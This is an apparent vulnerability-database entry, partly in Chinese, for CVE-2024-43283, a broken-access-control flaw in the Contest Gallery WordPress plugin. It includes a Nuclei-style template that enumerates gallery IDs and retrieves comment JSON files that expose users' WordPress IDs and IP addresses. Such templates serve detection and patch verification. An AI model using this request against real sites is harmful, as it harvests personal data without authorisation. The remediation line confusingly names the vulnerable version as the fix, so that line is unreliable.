漏洞描述
Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions.
CVE-2024-43283: Contest Gallery - Broken Access Control
PoC代码[已公开]
id: CVE-2024-43283
info:
name: Contest Gallery - Broken Access Control
author: popcorn94
severity: medium
description: |
Contest Gallery from n/a through 23.1.2 contains an exposure of sensitive information to an unauthorized actor caused by insufficient access controls, letting attackers access sensitive data, exploit requires no specific conditions.
impact: |
Unauthorized actors can access sensitive information, leading to privacy breaches and potential misuse of data.
remediation: |
Update to the latest version 23.1.2 or later to address the issue.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contest-gallery/contest-gallery-2312-unauthenticated-information-exposure
- https://nvd.nist.gov/vuln/detail/CVE-2024-43283
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2024-43283
epss-score: 0.16991
epss-percentile: 0.94825
cwe-id: CWE-200
metadata:
verified: true
max-request: 1
tags: cve,cve2024,wordpress,wp,wp-plugin,contest-gallery,disclosure,vkev
http:
- raw:
- |
GET /wp-content/uploads/contest-gallery/gallery-id-{{path}}/json/image-comments/image-comments-{{path}}.json HTTP/1.1
Host: {{Hostname}}
payloads:
path: helpers/wordlists/numbers.txt
attack: batteringram
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'WpUserId":'
- 'userIP":'
condition: and
case-insensitive: true
- type: word
part: content_type
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a0046304402203676d81dc77c195aed92cbfd8587908298010b34e4d4b041e060c0aeba7b3df502204cf975c8548b873c32fc5ffcdfd70170ef16c1081f4db11e29619c5d3a1620ab:922c64590222798bb761d5b6d8e72950